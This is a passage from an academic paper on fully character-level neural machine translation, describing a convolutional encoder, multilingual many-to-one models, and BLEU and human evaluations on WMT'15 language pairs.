Character-Level Translation 3.1 Why Character-Level? The benefits of character-level translation over word-level translation are well known. Chung et al. (2016) present three main arguments: character level models (1) do not suffer from out-of-vocabulary is- sues, (2) are able to model different, rare morpho- logical variants of a word, and (3) do not require seg- mentation. Particularly, text segmentation is highly non-trivial for many languages and problematic even for English as word tokenizers are either manually designed or trained on a corpus using an objective function that is unrelated to the translation task at hand, which makes the overall system sub-optimal. Here we present two additional arguments for character-level translation. First, a character-level translation system can easily be applied to a mul- tilingual translation setting. Between European lan- guages where the majority of alphabets overlaps, for instance, a character-level model may easily iden- tify morphemes that are shared across different lan- guages. A word-level model, however, will need a separate word vocabulary for each language, allow- ing no cross-lingual parameter sharing. Also, by not segmenting source sentences into words, we no longer inject our knowledge of words and word boundaries into the system; instead, we encourage the model to discover an internal struc- ture of a sentence by itself and learn how a sequence of symbols can be mapped to a continuous meaning representation. 3.2 Related Work To address these limitations associated with word- level translation, a recent line of research has inves- tigated using sub-word information. Costa-Jussá and Fonollosa (2016) replaced the word-lookup table with convolutional and highway layers on top of character embeddings, while still segmenting source sentences into words. Target sen- tences were also segmented into words, and predic- tions were made at word-level. Similarly, Ling et al. (2015) employed a bidirec- tional LSTM to compose character embeddings into word embeddings. At the target side, another LSTM takes the hidden state of the decoder and generates the target word, character by character. While this system is completely open-vocabulary, it also re- quires offline segmentation. Character-to-word and word-to-character LSTMs significantly slow down training, as well. Most recently, Luong and Manning (2016) pro- posed a hybrid scheme that consults character-level information whenever the model encounters an out- of-vocabulary word. As a baseline, they also imple- mented a purely character-level NMT model with 4 layers of unidirectional LSTMs with 512 cells, with attention over each character. Despite being extremely slow (approximately 3 months to train), the character-level model gave a comparable perfor- mance to the word-level baseline. This shows the possibility of fully character-level translation. Having a word-level decoder restricts the model to only being able to generate previously seen words. Sennrich et al. (2015) introduced a subword-level NMT model that is capable of open-vocabulary translation using subword-level segmentation based on the byte pair encoding (BPE) algorithm. Starting from a character vocabulary, the algorithm identi- fies frequent character n-grams in the training data and iteratively adds them to the vocabulary, ulti- mately giving a subword vocabulary which consists of words, subwords and characters. Once the seg- mentation rules have been learned, their model per- forms subword-to-subword translation (bpe2bpe) in the same way as word-to-word translation. Perhaps the work that is closest to our end goal is (Chung et al., 2016), which used a subword-level encoder from (Sennrich et al., 2015) and a fully character-level decoder (bpe2char). Their results show that character-level decoding performs better than subword-level decoding. Motivated by this work, we aim for fully character-level translation at both sides (char2char). Outside NMT, our work is based on a few exist- ing approaches that applied convolutional networks 367 to text, most notably in text classification (Zhang et al., 2015; Xiao and Cho, 2016). We also drew in- spiration for our multilingual models from previous work that showed the possibility of training a single recurrent model for multiple languages in domains other than translation (Tsvetkov et al., 2016; Gillick et al., 2015). 3.3 Challenges Sentences are on average 6 (DE, CS and RU) to 8 (FI) times longer when represented in characters. This poses three major challenges to achieving fully character-level translation. (1) Training/decoding latency For the decoder, al- though the sequence to be generated is much longer, each character-level softmax operation costs consid- erably less compared to a word- or subword-level softmax. Chung et al. (2016) report that character- level decoding is only 14% slower than subword- level decoding. On the other hand, computational complexity of the attention mechanism grows quadratically with respect to the sentence length, as it needs to attend to every source token for every target token. This makes a naive character-level approach, such as in Luong and Manning (2016), computationally prohibitive. Consequently, reducing the length of the source sequence is key to ensuring reasonable speed in both training and decoding. (2) Mapping character sequence to continuous representation The arbitrary relationship between the orthography of a word and its meaning is a well- known problem in linguistics (de Saussure, 1916). Building a character-level encoder is arguably a more difficult problem, as the encoder needs to learn a highly non-linear function from a long sequence of character symbols to a meaning representation. (3) Long range dependencies in characters A character-level encoder needs to model dependen- cies over longer timespans than a word-level en- coder does. 4 Fully Character-Level NMT 4.1 Encoder We design an encoder that addresses all the chal- lenges discussed above by using convolutional and pooling layers aggressively to both (1) drastically shorten the input sentence; and (2) efficiently capture local regularities. Inspired by the character- level language model from Kim et al. (2015), our encoder first reduces the source sentence length with a series of convolutional, pooling and highway layers. The shorter representation, instead of the full character sequence, is passed through a bidirectional GRU to (3) help it resolve long term dependencies. We illustrate the proposed encoder in Figure 1 and discuss each layer in detail below. Embedding We map the sequence of source characters (x1, . . . ,xTx) to a sequence of character embeddings of dimensionality dc: X = (C(x1), . . . ,C(xTx)) ∈ Rdc×Tx where Tx is the number of source characters and C is the character embedding lookup table: C ∈ Rdc×|C|. Convolution One-dimensional convolution opera- tion is then used along consecutive character embed- dings. Assuming we have a single filter f ∈ Rdc×w of width w, we first apply padding to the beginning and the end of X, such that the padded sentence X′ ∈ Rdc×(Tx+w−1) is w − 1 symbols longer. We then apply a narrow convolution between X′ and f such that the k-th element of the output Yk is given as: Yk = (X ′ ∗ f)k = ∑ i,j (X′[:,k−w+1:k] ⊗ f)ij, (3) where ⊗ denotes elementwise matrix multiplication and ∗ is the convolution operation. X′ [:,k−w+1:k] is the sliced subset of X′ that contains all the rows but only w adjacent columns. The padding scheme em- ployed above, commonly known as half convolution, ensures that the length of the output is identical to the length of the input, (i.e., Y ∈ R1×Tx). We just illustrated how a single convolutional filter of fixed width might be applied to a sentence. In order to extract informative character patterns of different lengths, we employ a set of filters of varying widths. More concretely, we use a filter 368 _ _ T h e s e c o n d p e r s o n _ _ Single-layer Convolution + ReLU Max Pooling with Stride 5 Four-layer Highway Network Single-layer Bidirectional GRU Character Embeddings ℝ#×%& ℝ()×(%&+,-#) ℝ/×%& ℝ/×(%& 0⁄ ) ℝ/×(%& 0⁄ ) Segment Embeddings Figure 1: Encoder architecture schematics. Underscore denotes padding. A dotted vertical line delimits each segment. The stride of pooling s is 5 in the diagram. bank F = {f1, . . . ,fm} where fi = Rdc×i×ni is a collection of ni filters of width i. Our model uses m = 8, hence extracting character n-grams up to 8 characters long. Outputs from all the filters are stacked upon each other, giving a single repre- sentation Y ∈ RN×Tx , where the dimensionality of each column is given by the total number of filters N = ∑m i=1 ni. Finally, rectified linear activation (ReLU) is applied elementwise to this representation. Max pooling with stride The output from the con- volutional layer is first split into segments of width s, and max-pooling over time is applied to each seg- ment with no overlap. This procedure selects the most salient features to give a segment embedding. Each segment embedding is a summary of meaning- ful character n-grams occurring in a particular (over- lapping) subsequence in the source sentence. Note that the rightmost segment (above ‘on’) in Figure 1 may capture ‘son’ (the filter in green) although ‘s’ occurs in the previous segment. In other words, our segments are overlapping as opposed to in word- or subword-level models with hard segmentation. Segments act as our internal linguistic unit from this layer and above: the attention mechanism, for instance, attends to each source segment instead of source character. This shortens the source repre- sentation s-fold: Y ′ ∈ RN×(Tx/s). Empirically, we found using a smaller s leads to better performance at increased training time. We chose s = 5 in our experiments as it gives a reasonable balance between the two. Highway network A sequence of segment embed- dings from the max pooling layer is fed into a high- way network (Srivastava et al., 2015). Highway net- works are shown to significantly improve the qual- ity of a character-level language model when used with convolutional layers (Kim et al., 2015). A high- way network transforms input x with a gating mech- anism that adaptively regulates information flow: y = g � ReLU(W1x + b1) + (1−g)�x, where g = σ((W2x + b2)). We apply this to each segment embedding individually. Recurrent layer Finally, the output from the highway layer is given to a bidirectional GRU from §2, using each segment embedding as input. Subword-level encoder Unlike a subword-level encoder, our model does not commit to a specific choice of segmentation; instead it is trained to consider every possible character pattern and extract only the most meaningful ones. Therefore, the definition of segmentation in our model is dynamic unlike subword-level encoders. During training, the model finds the most salient character patterns in a sentence via max-pooling, and the character 369 Bilingual bpe2char char2char Vocab size 24,440 300 Source emb. 512 128 Target emb. 512 512 Conv. filters 200-200-250-250 -300-300-300-300 Pool stride 5 Highway 4 layers Encoder 1-layer 512 GRUs Decoder 2-layer 1024 GRUs Table 1: Bilingual model architectures. The char2char model uses 200 filters of width 1, 200 filters of width 2, · · · and 300 filters of width 8. sequences extracted by the model change over the course of training. This is in contrast to how BPE segmentation rules are learned: the segmentation is learned and fixed before training begins. 4.2 Attention and Decoder Similarly to the attention model in Chung et al. (2016) and Firat et al. (2016a), a single-layer feed- forward network computes the attention score of next target character to be generated with every source segment representation. A standard two- layer character-level decoder then takes the source context vector from the attention mechanism and predicts each target character. This decoder was de- scribed as base decoder by Chung et al. (2016). 5 Experiment Settings 5.1 Task and Models We evaluate the proposed character-to-character (char2char) translation model against subword- level baselines (bpe2bpe and bpe2char) on the WMT’15 DE→EN, CS→EN, FI→EN and RU→EN translation tasks.1 We do not consider word-level models, as it has already been shown that subword-level models outperform them by mit- igating issues inherent to closed-vocabulary transla- tion (Sennrich et al., 2015; Sennrich et al., 2016). Indeed, subword-level NMT models have been the de-facto state-of-the-art and are now used in a very large-scale industry NMT system to serve millions of users per day (Wu et al., 2016). 1http://www.statmt.org/wmt15/translation -task.html We experiment in two different scenarios: 1) a bilin- gual setting where we train a model on data from a single language pair; and 2) a multilingual setting where the task is many-to-one translation. We train a single model on data from all four language pairs. Hence, our baselines and models are: (a) bilingual bpe2bpe: from (Firat et al., 2016a) (b) bilingual bpe2char: from (Chung et al., 2016) (c) bilingual char2char (d) multilingual bpe2char (e) multilingual char2char We train all the models ourselves other than (a), for which we report the results from Firat et al. (2016a). We detail the configuration of our models in Table 1 and Table 2. 5.2 Datasets and Preprocessing We use all available parallel data on the four lan- guage pairs from WMT’15: DE-EN, CS-EN, FI-EN and RU-EN. For the bpe2char baselines, we only use sentence pairs where the source is no longer than 50 subword symbols. For our char2char models, we only use pairs where the source sentence is no longer than 450 characters. For all the language pairs apart from FI-EN, we use newstest-2013 as a develop- ment set and newstest-2014 and newstest-2015 as test sets. For FI-EN, we use newsdev-2015 and newstest-2015 as development and test sets, respec- tively. We tokenize2 each corpus using the script from Moses.3 When training bilingual bpe2char models, we ex- tract 20,000 BPE operations from each of the source and target corpus using a script from Sennrich et al. (2015). This gives a source BPE vocabulary of size 20k−24k for each language. 5.3 Training Details Each model is trained using stochastic gradient de- scent and Adam (Kingma and Ba, 2014) with a learning rate of 0.0001 and minibatch size 64. Train- ing continues until the BLEU score on the validation 2This is unnecessary for char2char models, yet was carried out for comparison. 3https://github.com/moses-smt/mosesdecod er 370 Multilingual bpe2char char2char Vocab size 54,544 400 Source emb. 512 128 Target emb. 512 512 Conv. filters 200-250-300-300 -400-400-400-400 Pool stride 5 Highway 4 layers Encoder 1-layer 512 GRUs Decoder 2-layer 1024 GRUs Table 2: Multilingual model architectures. set stops improving. The norm of the gradient is clipped with a threshold of 1 (Pascanu et al., 2013). All weights are initialized from a uniform distribu- tion [−0.01,0.01]. Each model is trained on a single pre-2016 GTX Titan X GPU with 12GB RAM. 5.4 Decoding Details As done by Chung et al. (2016), a two-layer uni- directional character-level decoder with 1024 GRU units is used for all our experiments. For decod- ing, we use a beam search algorithm with length- normalization to penalize shorter hypotheses. The beam width is 20 for all models. 5.5 Training Multilingual Models Task description We train a model on a many-to- one translation task to translate a sentence in any of the four languages (German, Czech, Finnish and Russian) to English. We do not provide a language identifier to the encoder, but merely the sentence itself, encouraging the model to perform language identification on the fly. In addition, by not providing the language identifier, we expect the model to handle intra-sentence code-switching seamlessly. Model architecture The multilingual char2char model uses slightly more convolutional filters than the bilingual char2char model, namely (200-250- 300-300-400-400-400-400). Otherwise, the archi- tecture remains the same as shown in Table 1. By not changing the size of the encoder and the decoder, we fix the capacity of the core translation module, and only allow the multilingual model to detect more character patterns. Similarly, the multilingual bpe2char model has the same encoder and decoder as the bilingual bpe2char model, but a larger vocabulary. We learn 50,000 multilingual BPE operations on the multilingual corpus, resulting in 54,544 subwords. See Table 2 for the exact configuration of our multilingual models. Data scheduling For the multilingual models, an appropriate scheduling of data from different lan- guages is crucial to avoid overfitting to one language too soon. Following Firat et al. (2016a) and Firat et al. (2016b), each minibatch is balanced, in that the proportion of each language pair in a single mini- batch corresponds to that of the full corpus. With this minibatch scheme, roughly the same number of updates is required to make one full pass over the entire training corpus of each language pair. Mini- batches from all language pairs are combined and presented to the model as a single minibatch. See Table 3 for the minibatch size for each language pair. DE-EN CS-EN FI-EN RU-EN corpus size 4.5m 12.1m 1.9m 2.3m minibatch size 14 37 6 7 Table 3: The minibatch size of each language (second row) is proportionate to the number of sentence pairs in each corpus (first row). Treatment of Cyrillic To facilitate cross-lingual pa- rameter sharing, we convert every Cyrillic charac- ter in the Russian source corpus to Latin alphabet according to ISO-9. Table 4 shows an example of how this conversion may help the multilingual mod- els identify lexemes that are shared across multiple languages. school schools CS škola školy RU школа школы RU (ISO-9) škola školy Table 4: Czech and Russian words for school and schools, alongside the conversion of Russian characters into Latin. Multilingual BPE For the multilingual bpe2char model, multilingual BPE segmentation rules are extracted from a large dataset containing training source corpora of all the language pairs. To ensure the BPE rules are not biased towards one language, 371 Setting Src Trg Dev Test1 Test2 DE-EN (a)∗ bi bpe bpe 24.13 24.00 (b) bi bpe char 25.64 24.59 25.27 (c) bi char char 26.30 25.77 25.83 (d) multi bpe char 24.92 24.54 25.23 (e) multi char char 25.67 25.13 25.79 CS-EN (f)∗ bi bpe bpe 21.24 20.32 (g) bi bpe char 22.95 23.78 22.40 (h) bi char char 23.38 24.08 22.46 (i) multi bpe char 23.27 24.27 22.42 (j) multi char char 24.09 25.01 23.24 FI-EN (k)∗ bi bpe bpe 13.15 12.24 (l) bi bpe char 14.54 13.98 (m) bi char char 14.18 13.10 (n) multi bpe char 14.70 14.40 (o) multi char char 15.96 15.74 RU-EN (p)∗ bi bpe bpe 21.04 22.44 (q) bi bpe char 21.68 26.21 22.83 (r) bi char char 21.75 26.80 22.73 (s) multi bpe char 21.75 26.31 22.81 (t) multi char char 22.20 26.33 23.33 Table 5: BLEU scores of five different models on four language pairs. For each test or development set, the best performing model is shown in bold. (∗) results are taken from (Firat et al., 2016a). larger datasets such as Czech and German corpora are trimmed such that every corpus contains, ap- proximately, an equal number of characters. 6 Quantitative Analysis 6.1 Evaluation with BLEU Score In this section, we first establish our main hypothe- ses for introducing character-level and multilingual models, and investigate whether our observations support or disagree with our hypotheses. From our empirical results, we want to verify: (1) if fully character-level translation outperforms subword- level translation, (2) in which setting and to what extent is multilingual translation beneficial and (3) if multilingual, character-level translation achieves superior performance to other models. We outline our results with respect to each hypothesis below. (1) Character-level vs. subword-level In a bilin- gual setting, the char2char model outperforms both subword-level baselines on DE-EN (Table 5 (a-c)) and CS-EN (Table 5 (f-h)). On the other two language pairs, it exceeds the bpe2bpe model and achieves a similar performance with the bpe2char baseline (Table 5 (k-m) and (p-r)). We conclude that the proposed character-level model is comparable to or better than both subword-level baselines. Meanwhile, in a multilingual setting, the character-level encoder significantly surpasses the subword-level encoder consistently in all the language pairs (Table 5 (d-e), (i-j), (n-o) and (s-t)). From this, we conclude that translating at the level of characters allows the model to discover shared constructs between languages more effectively. This also demonstrates that the character-level model is more flexible in assigning model capacity to different language pairs. (2) Multilingual vs. bilingual At the level of char- acters, we note that multilingual translation is indeed strongly beneficial. On the test sets, the multilin- gual character-level model outperforms the single- pair character-level model by 2.64 BLEU in FI-EN (Table 5 (m, o)) and 0.78 BLEU in CS-EN (Ta- ble 5 (h, j)), while achieving comparable results on DE-EN and RU-EN. At the level of subwords, on the other hand, we do not observe the same degree of performance benefit. The multilingual bpe2char model requires much more updates to reach the performance of the bilingual bpe2char model (see Figure 2). This 372 Adequacy Fluency Setting Src Trg Raw (%) Stnd. (σ) Raw (%) Stnd. (σ) DE-EN (a) bi bpe char 65.47 -0.0536 68.64 0.0052 (b) bi char char 68.11 0.0509 68.80 0.0468 (c) multi char char 67.80 0.0281 68.92 0.0282 CS-EN (d) bi bpe char 62.76 0.0361 61.62 -0.0285 (e) bi char char 60.78 -0.0154 63.37 0.0410 (f) multi char char 63.03 0.0415 65.08 0.1047 FI-EN (g) bi bpe char 47.03 -0.1326 59.33 -0.0329 (h) bi char char 50.17 -0.0650 59.97 -0.0216 (i) multi char char 50.95 -0.0110 63.26 0.0969 RU-EN (j) bi bpe char 61.26 -0.1062 57.74 -0.0592 (k) bi char char 64.06 0.0105 59.85 0.0168 (l) multi char char 64.77 0.0116 63.32 0.1748 Table 6: Human evaluation results for adequacy and fluency. We present both the averaged raw scores (Raw) and the averaged standardized scores (Stnd.). Standardized adequacy is used to rank the systems and standardized fluency is used to break ties. A positive standardized score should be interpreted as the number of standard deviations above this particular worker’s mean score that this system scored on average. For each language pair, we boldface the best performing model with statistical significance. When there is a tie, we boldface both systems. suggests that learning useful subword segmentation across languages is difficult. (3) Multilingual char2char vs. others The mul- tilingual char2char model is the best performer in CS-EN, FI-EN and RU-EN (Table 5 (j, o, t)), and is the runner-up in DE-EN (Table 5 (e)). The fact that the multilingual char2char model outperforms the single-pair models goes to show the parameter efficiency of character-level translation: instead of training N separate models for N language pairs, it is possible to get a better performance with a single multilingual character-level model. 6.2 Human Evaluation It is well known that automatic evaluation met- rics such as BLEU encourage reference-like transla- tions and do not fully capture true translation qual- ity (Callison-Burch, 2009; Graham et al., 2015). Therefore, we also carry out a recently proposed evaluation from Graham et al. (2017) where we have human assessors rate both (1) adequacy; and (2) flu- ency of each system translation on a scale from 0 to 100 via Amazon Mechanical Turk. Adequacy is the degree to which assessors agree that the system translation expresses the meaning of the reference translation. Fluency is evaluated using system trans- lation alone without any reference translation. Approximately 1K Turkers assessed a single test set (3K sentences in newstest-2014) for each system and language pair. Each Turker conducted a mini- mum of 100 assessments for quality control, and the set of scores generated by each Turker was standard- ized to remove any bias in the individual’s scoring strategy. We consider three models (bilingual bpe2char, bilingual char2char and multilingual char2char) for the human evaluation. We leave out the multilingual bpe2char model to minimize the number of similar systems to improve the interpretability of the evalu- ation overall. For DE-EN, we observe that the multilingual char2char and bilingual char2char models are tied with respect to both adequacy and fluency (Ta- ble 6 (b-c)). For CS-EN, the multilingual char2char and bilingual bpe2char models are tied for adequacy. However, the multilingual char2char model yields significantly better fluency (Table 6 (d, f)). For FI- EN and RU-EN, the multilingual char2char model is tied with the bilingual char2char model with respect to adequacy, but significantly outperforms all other models in fluency (Table 6 (g-i, j-l)). Overall, the improvement in translation quality yielded by the multilingual character-level model mainly comes from fluency. We conjecture that be- cause the English decoder of the multilingual model is tuned in on all the training sentence pairs, it 373 (a) Spelling mistakes DE ori Warum sollten wir nicht Freunde sei ? DE src Warum solltne wir nich Freunde sei ? EN ref Why should not we be friends ? bpe2char Why are we to be friends ? char2char Why should we not be friends ? (b) Rare words DE src Siebentausendzweihundertvierundfünfzig . EN ref Seven thousand two hundred fifty four . bpe2char Fifty-five Decline of the Seventy . char2char Seven thousand hundred thousand fifties . (c) Morphology DE src Die Zufahrtsstraßen wurden gesperrt , wodurch sich laut CNN lange Rückstaus bildeten . EN ref The access roads were blocked off , which , according to CNN , caused long tailbacks . bpe2char The access roads were locked , which , according to CNN , was long back . char2char The access roads were blocked , which looked long backwards , according to CNN . (d) Nonce words DE src Der Test ist nun über , aber ich habe keine gute Note . Es ist wie eine Verschlimmbesserung . EN ref The test is now over , but i don’t have any good grade . it is like a worsened improvement . bpe2char The test is now over , but i do not have a good note . char2char The test is now , but i have no good note , it is like a worsening improvement . (e) Multilingual Multi src Bei der Metropolitnı́ho výboru pro dopravu für das Gebiet der San Francisco Bay erklärten Beamte , der Kon- gress könne das Problem банкротство доверительного Фонда строительства шоссейных дорог einfach durch Erhöhung der Kraftstoffsteuer lösen . EN ref At the Metropolitan Transportation Commission in the San Francisco Bay Area , officials say Congress could very simply deal with the bankrupt Highway Trust Fund by raising gas taxes . bpe2char During the Metropolitan Committee on Transport for San Francisco Bay , officials declared that Congress could solve the problem of bankruptcy by increasing the fuel tax bankrupt . char2char At the Metropolitan Committee on Transport for the territory of San Francisco Bay , officials explained that the Congress could simply solve the problem of the bankruptcy of the Road Construction Fund by increasing the fuel tax . Table 7: Sample translations. For each example, we show the source sentence as src, the human translation as ref, and the translations from the subword-level baseline and our character-level model as bpe2char and char2char, re- spectively. For (a), the original, uncorrupted source sentence is also shown (ori). The source sentence in (e) contains words in German (in green), Czech (in yellow) and Russian (in blue). The translations in (a-d) are from the bilingual models, whereas those in (e) are from the multilingual models. becomes a better language model than a bilingual model’s decoder. We leave it for future work to con- firm if this is indeed the case. 7 Qualitative Analysis In Table 7, we demonstrate our character-level model’s robustness in four translation scenarios from which conventional NMT systems are known to suffer. We also showcase our model’s ability to seamlessly handle intra-sentence code-switching, or mixed utterances from two or more languages. We compare sample translations from the character- level model with those from the subword-level model, which already sidesteps some of the issues associated with word-level translation. With real-world text containing typos and spelling mistakes, the quality of word-based translation would severely drop, as every non-canonical form of a word cannot be represented. On the other hand, a character-level model has a much better chance recovering the original word or sentence. Indeed, our char2char model is robust against a few spelling 374 (f) Long-distance dependencies DE src Der Rückgang zusammen mit einem verstärkten Sinken der Anzahl der Hausbesitzer unter 35 Jahren könnte dazu führen , dass Gartenzentren zehntausende Pfund pro Jahr verlieren , wenn die heutigen jungen Konsumenten nach einer Studie der HTA , wie in der Financial Times berichtet , die “ Kernaltersgruppe für Gartenprodukte ” erreichen . EN ref The drop , coupled with a particular decline in the number of homeowners aged under 35 , could result in garden centres losing out on tens of millions of pounds a year when today ’s young consumers reach the “ core gardening age group , ” according to the HTA ’s study , which was reported by the Financial Times . bpe2char The decline , together with reinforcing sinks of the number of householders under the age of 35 , could lead to tens of thousands of Garden Centres losing tens of thousands of pounds a year if today ’s young consumers reach the “ kernel group of gardening products ” according to a study of the HTA , as reported in the Financial Times . char2char The decline , together with a reduction in the number of household owners under the age of 35 , may lead to tens of thousands of pounds per year if today ’s young consumers report after a study of the HTA , as reported in the Financial Times , the “ kernal age group for garden products ” . Table 8: In this sample translation, the proposed character-to-character model fails to adequately capture a long-term dependency. mistakes (Table 7 (a)). Given a long, rare word such as “Sieben- tausendzweihundertvierundfünfzig” (seven thou- sand two hundred fifty four) in Table 7 (b), the subword-level model segments “Siebentausend” as (Sieb, ent, aus, end), which results in an inaccurate translation. The character-level model performs bet- ter on these long, concatenative words with ambigu- ous segmentation. We expect a character-level model to handle novel and unseen morphological inflections well. We ob- serve that this is indeed the case, as our char2char model correctly understands “gesperrt”, a past par- ticiple form of “sperren” (to block) (Table 7 (c)). Nonce words are terms coined for a single use. They are not actual words but are constructed in a way that humans can intuitively guess what they mean, such as workoliday and friyay. We construct a few DE-EN sentence pairs that contain German nonce words (one example shown in Table 7 (d)), and observe that the character-level model can in- deed detect salient character patterns and arrive at a correct translation. Finally, we evaluate our multilingual models’ ca- pacity to perform intra-sentence code-switching, by giving them as input mixed sentences from multiple languages. The newstest-2013 development datasets for DE-EN, CS-EN and FI-EN contain intersecting examples with the same English sentences. We com- pile a list of these sentences in DE/CS/FI and their translation in EN, and uniformly choose a few sam- ples at random from the English side. Words or clauses from different languages are manually inter- mixed to create multilingual sentences. We discover that when given sentences with a high degree of language intermixing, as in Ta- ble 7 (e), the multilingual bpe2char model fails to seamlessly handle alternation of languages. Overall, however, both multilingual models generate reason- able translations. This is possible because we did not provide a language identifier when training our multilingual models. As a result, they learned to un- derstand a multilingual sentence and translate it into a coherent English sentence. There are indeed cases where the proposed character-level model fails, and we notice that those are often sentences with long-distance dependencies (see Table 8). We show supplementary, sample translations in each scenario on a webpage.4 Training and decoding speed On a single Titan X GPU, we observe that our char2char models are ap- proximately 35% slower to train than our bpe2char baselines when the same batch size was used. Our bilingual character-level models can be trained in roughly two weeks. We further note that the bilingual bpe2char model can translate 3,000 sentences in 66.63 minutes while the bilingual char2char model requires 71.71 minutes (online, not in batch). See Table 9 for the exact details. Further observations We also note that the mul- 4https://sites.google.com/site/dl4mtc2c 375 Model Time to execute 1k updates (s) Batch size Time to decode 3k sentences (m) FI-EN bpe2char 2461.72 128 66.63 char2char 2371.93 64 71.71 Multi bpe2char 1646.37 64 68.99 char2char 2514.23 64 72.33 Table 9: Speed comparison. The second column shows the time taken to execute 1,000 training updates. The model makes each update after having seen one mini- batch. tilingual models are less prone to overfitting than the bilingual models. This is particularly visible for low-resource language pairs such as FI-EN. Figure 2 shows the evolution of the FI-EN validation BLEU scores where the bilingual models overfit rapidly but the multilingual models seem to regularize learning by training simultaneously on other language pairs. Figure 2: Multilingual models overfit less than bilingual models on low-resource language pairs. 8 Conclusion We propose a fully character-level NMT model that accepts a sequence of characters in the source lan- guage and outputs a sequence of characters in the target language. What is remarkable about this model is the absence of explicitly hard-coded knowl- edge of words and their boundaries, and that the model learns these concepts from a translation task alone. Our empirical results show that the fully character-level model performs as well as, or bet- ter than, subword-level translation models. The performance gain is distinctly pronounced in the multilingual many-to-one translation task, where re- sults show that the character-level model can assign model capacities to different languages more effi- ciently than the subword-level models. We observe a particularly large improvement in FI-EN transla- tion when the model is trained to translate multiple languages, indicating a positive cross-lingual trans- fer to a low-resource language pair. We discover two main benefits of the multilin- gual character-level model: (1) it is much more parameter-efficient than the bilingual models; and (2) it can naturally handle intra-sentence code- switching as a result of the many-to-one transla- tion task. Ultimately, we present a case for fully character-level translation: that translation at the level of character is strongly beneficial and should be encouraged more. The repository https://github.com/nyu-dl /dl4mt-c2c contains the source code and pre- trained models for reproducing the experimental re- sults. In the next stage of this research, we will in- vestigate extending our multilingual many-to-one translation models to perform many-to-many trans- lations, which will allow the decoder, similarly with the encoder, to learn from multiple target languages. Furthermore, a more thorough investigation into model architectures and hyperparameters is needed. Acknowledgements Kyunghyun Cho thanks the support of eBay, Face- book, Google (Google Faculty Award, 2016) and NVidia (NVIDIA AI Lab, 2016-2019). This work was partly supported by the Samsung Advanced In- stitute of Technology (Deep Learning). Jason Lee was supported by the Qualcomm Innovation Fellow- ship, and thanks David Yenicelik and Kevin Walli- mann for their contribution in designing the qualita- tive analysis. The authors would like to also thank Prof. Zheng Zhang (NYU, Shanghai) for fruitful discussions and comments, as well as Yvette Gra- ham for her help with the human evaluation. Finally, the authors thank the Action Editor and anonymous reviewers for their constructive feedback. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of 376 the International Conference on Learning Represen- tations. Chris Callison-Burch. 2009. Fast, cheap, and creative: Evaluating translation quality using amazon’s mechan- ical turk. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, pages 286–295. Kyunghyun Cho, Bart van Merriënboer, Dzmitry Bah- danau, and Yoshua Bengio. 2014a. On the proper- ties of neural machine translation: Encoder-decoder approaches. In Proceedings of the 8th Workshop on Syntax, Semantics, and Structure in Statistical Trans- lation, pages 103–111. Kyunghyun Cho, Bart van Merriënboer, Caglar Gulcehre, Fethi Bougares, Holger Schwenk, and Yoshua Ben- gio. 2014b. Learning phrase representations using RNN encoder-decoder for statistical machine transla- tion. In Proceedings of the Empiricial Methods in Nat- ural Language Processing, pages 1724–1734. Junyoung Chung, Kyunghyun Cho, and Yoshua Bengio. 2016. A character-level decoder without explicit seg- mentation for neural machine translation. In Proceed- ings of the 54th Annual Meeting of the Association for Computational Linguistics, pages 1693–1703. Marta R. Costa-Jussá and Josè A. R. Fonollosa. 2016. Character-based neural machine translation. In Pro- ceedings of the 54th Annual Meeting of the Association for Computational Linguistics, pages 357–361. Ferdinand de Saussure. 1916. Course in General Lin- guistics. Orhan Firat, Kyunghyun Cho, and Yoshua Bengio. 2016a. Multi-way, multilingual neural machine trans- lation with a shared attention mechanism. In Proceed- ings of the 2016 Conference of the North American Chapter of the Association for Computational Linguis- tics, pages 866–875. Orhan Firat, Baskaran Sankaran, Yaser Al-Onaizan, Fatos T. Yarman Vural, and Kyunghyun Cho. 2016b. Zero-resource translation with multi-lingual neural machine translation. In Proceedings of the 2016 Con- ference on Empirical Methods in Natural Language Processing, pages 268–277. Dan Gillick, Cliff Brunk, Oriol Vinyals, and Amarnag Subramanya. 2015. Multilingual language processing from bytes. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics, pages 1296–1306. Yvette Graham, Nitika Mathur, and Timothy Baldwin. 2015. Accurate evaluation of segment-level machine translation metrics. In Proceedings of the 2015 Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 1183–1191. Yvette Graham, Timothy Baldwin, Alistair Moffat, and Justin Zobel. 2017. Can machine translation systems be evaluated by the crowd alone. Natural Language Engineering, 23(1):3–30. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Ray S. Jackendoff. 1992. Semantic Structures, Vol- ume 18. MIT press. Sébastien Jean, Kyunghyun Cho, Roland Memisevic, and Yoshua Bengio. 2015. On using very large target vo- cabulary for neural machine translation. In Proceed- ings of the 53rd Annual Meeting of the Association for Computational Linguistics, pages 1–5. Yoon Kim, Yacine Jernite, David Sontag, and Alexan- der M. Rush. 2015. Character-aware neural language models. In Proceedings of the 30th AAAI Conference on Artificial Intelligence, pages 2741–2749. Diederik Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. In Proceedings of the 3rd International Conference for Learning Repre- sentations. Wang Ling, Isabel Trancoso, Chris Dyer, and Alan W. Black. 2015. Character-based neural machine transla- tion. arXiv preprint arXiv:1511.04586. Minh-Thang Luong and Christopher D. Manning. 2016. Achieving open vocabulary neural machine translation with hybrid word-character models. In Proceedings of the 54th Annual Meeting of the Association for Com- putational Linguistics, pages 1054–1063. Minh-Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention- based neural machine translation. In Proceedings of the 54th Annual Meeting of the Association for Com- putational Linguistics, pages 1412–1421. Razvan Pascanu, Tomas Mikolov, and Yoshua Bengio. 2013. On the difficulty of training recurrent neural net- works. In Proceedings of the 30th International Con- ference on Machine Learning, pages 1310–1318. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2015. Neural machine translation of rare words with subword units. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguis- tics, pages 1715–1725. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. Edinburgh neural machine translation systems for WMT 16. In Proceedings of the 1st Conference on Machine Translation. Rupesh Kumar Srivastava, Klaus Greff, and Jürgen Schmidhuber. 2015. Training very deep networks. In Advances in Neural Information Processing 